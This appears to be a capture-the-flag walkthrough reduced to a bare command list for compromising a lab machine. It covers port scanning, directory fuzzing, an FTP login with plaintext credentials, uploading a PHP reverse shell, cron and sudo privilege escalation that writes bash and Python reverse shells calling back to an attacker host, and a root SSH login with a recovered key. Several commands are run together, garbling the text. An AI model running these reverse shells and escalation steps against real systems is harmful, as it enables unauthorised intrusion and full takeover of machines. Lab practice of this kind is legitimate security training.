nmap -A $VICTIM
Last updated
nmap -sV -sT -O -p 1-65535 $VICTIMgobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txtffuf -c -u http://$VICTIM/post.php?post=FUZZ -w SecLists/Discovery/Web-Content/SVNDigger/cat/Language/php.txt
cat results.txt | grep -v 2422ffuf -c -u http://$VICTIM/post.php?post=FUZZ -w mylist.txt
cat results.txt | grep -v 2422ftp $VICTIM
Username:ftpuser
Password: givemefiles777 git clone https://github.com/pentestmonkey/php-reverse-shell.git
cp php-reverse-shell/php-reverse-shell.php .
nc -lvnp 1234 put php-reverse-shell.phppython3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fgsudo -lcat /etc/crontab
cd /home/toby/jobs/
sudo -u toby rm -f cow.sh
sudo -u toby touch cow.sh
sudo -u toby chmod 777 cow.sh
echo '#!/bin/bash' > cow.sh
echo 'sh -i >& /dev/tcp/$KALI/1338 0>&1' >> cow.shnc -lvnp 1338python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fgsudo -lnc -lvnp 4242cd /home/mat/scripts/
echo 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$KALI",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' > cmd.py
sudo -u will /usr/bin/python3 /home/mat/scripts/will_script.py 1python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fgcat /opt/backups/key.b64chmod 600 id_rsa
ssh root@$VICTIM -i id_rsa